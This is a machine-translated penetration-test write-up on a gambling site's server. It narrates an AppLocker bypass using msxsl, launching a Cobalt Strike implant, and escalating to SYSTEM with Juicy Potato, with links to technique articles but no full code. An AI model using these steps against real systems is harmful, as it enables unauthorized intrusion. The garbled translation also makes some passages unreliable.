Title: Bypass Applocker to escalation after BC's actual combat

0x01 Introduction

Tip: Just look at it as a negative case. In fact, the way you get it is far less troublesome than what is mentioned below. I just blame myself for being too impatient.

It was originally a promotional site created by the BC project before, but only got Shell at that time

Permissions are an ordinary user. When he wanted to raise permission to further collect information on the server, he found that running various things was a permission denied, and prompted the group policy to block the program. At that time, because there were other things, he did not continue to study it (the project has been authorized by the relevant department, the user name is more sensitive, and the whole process will be coded later).

0x02 Bypass Applocker

I suddenly remembered it recently, so I continued to do it and asked the master in the group

It’s easy to say after you know what it is. If you look for it patiently, you will always gain something. Applocker introduction:

https://baike.baidu.com/item/Applocker/2300852?fr=aladdin Then I found an article by Master 3g:

https://3gstudent.github.io/3gstudent.github.io/Use-msxsl-to-bypass-AppLocker/How to use it, read the article by yourself. After reading the article, the general idea of the follow-up will be clear.

0x03 Online to escalate

What I think is that bypass applocker allows the target server to execute the target server and perform subsequent raising of rights after my horse is launched, but the execution is performed under the shell

Net user, tasklist /SVC, etc. must not be echoed, otherwise you can use process comparison to judge the soft software (the small wheel I wrote myself, the matching process has been increased to 960+: http://get-av.se7ensec.cn/)

Since I don’t know, I will compete for my character and bet that there is no killing software in the host. I ran my horse through the third method of the 3g master article above, and then successfully went online, ignoring the machine below.

After CS is launched, run some commands, such as the following, and tasklist/SCV will still be denied access.

Then I tried the built-in CS system process command "ps" and successfully listed the system process. After looking at it, it really didn't kill the software.

/* Forgot to take a screenshot */

Run “

Shell systeminfo" I found that the system and patch information could be seen, but the system did not have a few patches at all. I was lucky. After checking the user permissions, it met Juicy Potato's requirements. You can directly try to withdraw the rights of Rotten Potato:

After testing, it was found that it was launched (in fact, there was execution permissions, but I didn't expect something was wrong at that time. I realized that something was wrong when I summarized the article later. See the end of the article for details). C:\Users\Public\ has execution permissions. I used Juicy Potato to execute with whoami parameters, and successfully returned to the system.

Then use it to dismount directly, and a System session will come in a few seconds. After flipping through the directory, I found that it is still a website group.

Take a screenshot of Administrator permissions. No wonder there are so many. It turns out that they all build websites in batches:

0x04 Summary

It happened that this time I was lucky and didn’t encounter Killer, otherwise it would have been a bumpy road and would be more challenging.

The most failure is that I did not fully understand some of the features of Applocker in advance this time:

https://www.anquanke.com/post/id/159892, I was anxious to search for the bypass method and started using it. In fact, what I encountered this time was just a limitation of the file path. C:\Users\Public\ can execute the program. It would not be so difficult to find out earlier. However, being able to fully understand the Applocker mechanism is also a reward.

Reprinted from the original link: https://mp.weixin.qq.com/s/eDe6g1gtM4HbMkxq6tkiEQ